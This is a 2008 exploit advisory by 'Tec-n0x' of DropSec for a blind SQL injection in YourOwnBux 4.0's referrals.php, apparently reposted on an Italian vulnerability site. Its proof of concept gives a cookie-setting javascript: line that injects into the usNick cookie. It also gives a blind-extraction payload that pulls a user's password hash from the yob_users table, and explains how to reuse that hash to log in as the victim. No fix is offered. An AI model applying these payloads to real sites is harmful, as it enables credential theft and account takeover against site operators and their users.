YourOwnBux 4.0 (COOKIE) Remote SQL Injection Vulnerability

2008-10-07 00:01:12

________ ._.
\______ \_______ ____ ______ ______ ____ ____ | |
| | \_ __ \/ _ \\____ \/ ___// __ \_/ ___\ | |
| ` \ | \( <_> ) |_> >___ \\ ___/\ \___ \|
/_______ /__| \____/| __/____ >\___ >\___ > __
\/ |__| \/ \/ \/ \/
.____ ___.
| | _____ \_ |__ ______
| | \__ \ | __ \ / ___/
| |___ / __ \| \_\ \\___ \
|_______ (____ /___ /____ >
\/ \/ \/ \/

---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]

-----[]===========[]=> Yourownbux v4.0 Blind SQL Injection Vulnerability ( referrals.php )

-----[]===========[]=> Discovered By: Tec-n0x
Contact: Tec-n0x <at> hotmail <dot> com

-----[]===========[]=> DropSec.com =~ Lab's ..!!

-----[]===========[]=> Gr33tz:
Celciuz, MurdeR, OzX, N.O.X, JosS, DDoS && All Friends

Special Gr33tz to: C1c4tr1Z ( http://lowsec.org )

---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]

POC:

Go to => http://site.com/referrals.php ( Logged in )
javascript:document.cookie="usNick=' AND 1=0 /*; expires=Thu, 2 Aug 2020 20:45:20 UTC; path=/";

=> Modify : ' AND 1=0 /* With Injection's.

=> Example: ' AND ascii(substring((SELECT password FROM yob_users where id=1),1,1))=100 /*

=> When You got the Hash ... Add the cookie usNick with the user [ Extract it with blind if you dont know ]
and the SHA1 Hash ( Exploit is going to be available Next Week on DropSec.com ).

---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]=---------------=[]


#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.